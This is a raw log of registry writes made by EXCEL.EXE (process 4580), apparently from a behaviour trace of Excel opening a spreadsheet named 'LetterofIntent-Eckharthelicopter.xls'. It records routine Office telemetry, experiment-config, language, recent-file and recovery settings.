HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
2629F457
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|13
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|3
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
VersionId
uint16_t|0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls
EnableActiveXControlMSWebBrowserArchiteturePersistenceIssue
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629FBBA
2629FBBA
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_CanvasBoot_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_CanvasLocalSaveDocument_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
fr-fr
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ru-ru
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
1
01D014000000001000284FFA2E01000000000000000400000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
de-de
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ru-ru
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
pt-br
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
de-de
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
4--
342D2D00E41100000000044001000000F2A918C3FC61D601D20600001D32BF610AC392449F757F82F56F1BC1424716C3FC61D6010000000000001000284FFA2E00000000060000006F006E000200000000000000000000000000556E6B6E6F776E00000000000000000000000000000000000000000000000000000000000000000000000000000000000DF0ADDE0DF0ADDE0DF0ADDE0DF0ADDE440045004600410055004C00540000000000AB0AD9010000D289EF42FF7F000040000000D901000000000000D90100005034A70CD901000048F1AFEB3B0000002020A30CD9010000D8F1AFEB3B000000D8F7AFEB3B00000000F5AFEB3B00000090168E0CD9010000D8F1AFEB3B00000098F4AFEB3B00000090168E0CD901000000F5AFEB3B000000340000C000000000D8F7AFEB3B000000D8F7AFEB3B00000010F2AFEB3B000000D031A70CD9010000B031A70CD90100005C0EBE22FF7F00000000000000000000C31EBE22FF7F0000E031A30CD90100008A28AE22FF7F0000FEFFFFFFFFFFFFFFD031A70CD901000000168E0CD901000090168E0CD901000090168E0CD9010000CE25BE22FF7F00009037AD0CD9010000B031A70CD901000098178E0CD901000008178E0CD9010000FEFFFFFFFFFFFFFFE865C622FF7F0000FEFFFFFFFFFFFFFF70178E0CD90100000000000000000000DB01BD22FF7F0000D0F1AFEB3B00000010F2AFEB3B000000D8F7AFEB3B000000998EC09A0B23E847E031A30CD90100008A28AE22FF7F0000000000000200000090168E0CD9010000E032A30CD9010000E031A30CD901000034030000000000001562BB22FF7F000030F2AFEB3B00000066F5AD22FF7F0000E031A30CD90100006380BC22FF7F00000000000000000000F8F1AFEB3B000000FEFFFFFFFFFFFFFF9675AD22FF7F00000000000000000000440045004600410055004C005400000030030000000000004014A50AD901000000000000FF7F00000000A50AD90100006020A30CD901000000F5AFEB3B00000090000000FF7F000098F4AFEB3B00000030030000000000000000000000000000C00CA50AD90100000000AB0AD90100009CBBEF42FF7F0000F006000000000000000000000000000000000000000000001C0000000000000000000000000000007668EF42FF7F0000000000000000000000000000000000000000AB0AD901000001000000FF7F0000000000000000000030D2A20CD90100001000000000000000FC000000CA02000000000000D901000020D2A20CD901000020D2A20CD9010000FF030000000000008000000000000000E0070000000000000D010000000000000D010000000000000D0100000000000000000000000000000300000000000000E0F7AFEB3B00
0000C0F4AFEB3B0000000496BF22FF7F0000353FFFFF6D00000088F4AFEB32FEFFFF0300000000000000E4C2AB0AD90100005001AB0AD90100007C010000000000006040A30CD9010000F61FBE22FF7F000020C3AB0AD90100000D01000000000000FEFFFFFFFFFFFFFFBF9ABF22FF7F000030F4AFEB3B00000066F5AD22FF7F000000000000D9010000F8008B40FF7F000000F9AFEB3B000000F00600000000000000000000000000009D01EF42FF7F00000D010000000000001700000000000000440045004600410055004C005400000090719340FF7F000002000002FF7F000098F5AFEB3B00000000000000000000004628AD20FF7F00004A030049FF7F000001000000000000003AC108F30000000001F5AFEB3B00000002000002FF7F00002020A30CD901000000000000D901000001F5AFEB3B0000000100000000000000340000C03B0000004A030049FF7F0000D084C722FF7F0000A884C722FF7F000050A0A60CD901000000178E0CD9010000407A971DFF7F00005034A70CD901000000000000000000000000000000000000407A971DFF7F000000000000000000006F00000000000000F0060000000000000000AB0AD9010000AB8EEF42FF7F00000000AB0AD901000002000000FF7F0000E006000000000000F0060000000000008806AB0AD9010000F8F4AFEB3B0000006040A30CD901000003000000FF7F00006040A30CD90100006040A30CD901000018000000000000007668EF42FF7F00002020A30CD9010000D67BD220FF7F00000000000000000000658BB922FF7F00005034A70CD9010000D67BD220FF7F000030881B1EFF7F00000100000000000000407A971DFF7F000000000000000000000800000000000000CB853C20FF7F0000A0D2A20CD9010000E006000000000000A0F9AFEB3B000000000000000000000030D2A20CD9010000A37C3C20FF7F000040D2A20CD9010000A0F9AFEB3B0000004FF406EBE915000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006E006F00
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSAllCategories
10
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
06020000170200000B020000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
BF010000CD030000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
pt-br
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\4580
0
0B0E101D32BF610AC392449F757F82F56F1BC1230046FEA98B96CCBF98EB016A0410240044FA5D64A89E01008500A907556E6B6E6F776EC9062E226D2B484F4D616659574A5464337373702B3165327141506A326C775347586F6C4A7635624B6E337449506B3D2200
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ja-jp
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ko-kr
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
fr-fr
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ko-kr
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
it-it
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
3--
332D2D00E41100000100000000000000424716C3FC61D60100000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
2629F457
04000000E41100003B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004C00650074007400650072006F00660049006E00740065006E0074002D00450063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000E06D65C5FC61D60157F4292657F4292600000000E0020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|4
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\4580
0
0B0E101D32BF610AC392449F757F82F56F1BC1230046FEA98B96CCBF98EB016A0410240044FA5D64A89E01008500A907556E6B6E6F776EC9062E22347947615039756D6C4332514C4546313631464A36303146316869753233304F4B50696D3844455633566B3D2200
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|10
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
es-es
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
es-es
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
tr-tr
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
it-it
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ja-jp
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
tr-tr
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
FOLDERID_Desktop
C:\Users\admin\Desktop\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
FOLDERID_Documents
C:\Users\admin\Documents\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|7
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
v<-
763C2D00E411000000000040010000002E8E65C5FC61D6018800000002000000780000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C006C00650074007400650072006F00660069006E00740065006E0074002D00650063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|11
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSForms
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls
EnableActiveXControlArchitetureIndependent
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
2
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
E407070005001800140037001E001803
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
DC00000000000000803A0900E407070005001800140037001E001803000000000000000000000000201C0000201C00008051010080510100805101008051010080F4030080F4030080F403002C01000084030000805101000000000084030000805101000A0000001E0000001E000000000000000000000080510100010000000100000000000000000000000000000000000000008D2700008D2700008D2700010000000A000000805101000000300000003000000030000000000084030000805101002C0100008403000080510100050000000500000005000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
E407070005001800140037001E001803
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
Expires
int64_t|0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
17846737,5804129,17696988,18409363,17339781,8758344,17634580,18375312,18658649,7668685,18948102,18428691,7214608,9319450,17126295,18658648,17322183,5850062,18384724,18658650,18637650,18674530,20789191,16920930,17311449,17698821,18409416,7668686,22131214,18948101,7398615,20026645,19978122,17182941,7668692,7440607,22131171,18711811,19153728,17182981,17182942,4859234,25514583,18384801,17322188,17331930,5601374,19543138,17146274,7668683,5898847,17622912,5850584,8263521,8254547,22070208,18633496,23729926,17182980,8988293,18474530,8697678,17922253,7649375,4317338,17372928,21030619,16859363,6636695,17322181,9176926,24466059,5850122,17956946,6366290,8448079,5850463,6690465,7649377,17064074,5850305,5850582,17425358,8750272,8709129,19223073,5898845,18917267,17182979,6166345,17885409,17846738,17182943,23729931,17322184,7459348,6636694,5850583,22131201,8430030,7218753,17846749,5810308,17182982,18970382,22595280,5850061,5898851,17331926,7668682,17331923,7668681,17698820,17846753,7668693,17331927,17846750,17331929,17127502,6137435,23459486,6170083,17127501,17698822,8988294,17106064,17846730,17698823,17846747,17846734,7398614,17110992,22853700,18948169,17846735,17846748,17846736,19261452,19261450,19261453,19261451,6341763,7116053,6366291,17610659,18716634,18716635,17372899,17102418,17914001,18917269,6029780,8750242,17913997,17913998,17913999,4289286,17914000,7463684,17914002,17914003,5898849,22872910,17962391,24466061,8433728,5898880,5898881,5898884,22929427,8701660,18917328,18917326,18949600,17578125,18917268,18917271,22131169,18917330,18970383,25514584,18949601,22595279,17322179,22131208,18208672,22131207,17127511,22131213,8750241,22853699,5850525,5587867,22929425,4564173,23414153,17127509,18208656,16815750,7690258,8263520,22083550,7463105,22872911,7690253,19978123,18647262,25514585,5601367,17962392,7966755,25514582,6647824,17573643,7868952,17445651,17106059,17445650,17106060,17106065,17106063,17962113,19744898,18625879,19531353,36467677,5601379,7202269,23978014,7168707,6059089,
17110988,5601366,8709120,18441314,17311443,8747207,19174148,18208657,22349186,17311450,18633497,9037324,8996805,4859233,17969938,18208715,18208705,18208658,17311446,8709078,8709086,8709089,18621250,8709081,20248016,16860185,7214607,8750274,16843347,20489431,17339214,17618826,18384725,7690256,19744899,19732354,5888003,19732353,36467808,7690254,19543137,18375313,18384802,18647260,18647259,18647261,20026646,7657413,7649378,7657414,17842627,8447777,16815754,18970381,19198081,17045407,17045408,8430031,8254544,6301592,17425365,24131419,17322180,17322182,17322187,22929429,8758345,36292435
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,1001 15,1000 15,1282 50,226 15,999 15,1338 50,1338 10,1249 10,998 15,1039 15,831 15,1282 10,1249 15,1338 15,1282 15,829 15,1128 15,291 15,850 15,1622 50,828 15,1255 15,830 15,974 15,670 15,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
excel.exe
02E0C11717D3479948A6D31022DB7415E01000000000000000300034003100310031002D003000380033002D00300034003300370032003900000001000000010000000600000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
ETag
std::wstring|"4yGaP9umlC2QLEF161FJ601F1hiu230OKPim8DEV3Vk="
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|8
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|18
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|9
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|19
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_CanvasOutSpaceSaveAs_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
Item 1
[F00000000][T01D661FCC7C57DF0][O00000000]*C:\Users\admin\Desktop\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
DeferredConfigs
std::wstring|ofsh6c2b1tla1a31,ofcrui4yvdulbf31,ofhpex3jznepoo31,ofaa1msspvo2xw31,ofgg6vdq3anjh131,of3ttwdwizkwt531,ofskuekmq22yki31
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
CountryCode
std::wstring|IT
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|12
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
Expires
int64_t|1595667333
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|6
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|15
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|16
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|17
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|14
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|5
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
2629F457
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSComctlLib
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:BizBar
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
FOLDERID_Documents
C:\Users\admin\Documents\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
FOLDERID_Desktop
C:\Users\admin\Desktop\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_InAppPurchase_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
TimeToNextcall
2020-07-25T20:55:36Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
Provider
0
4580
EXCEL.EXE
write
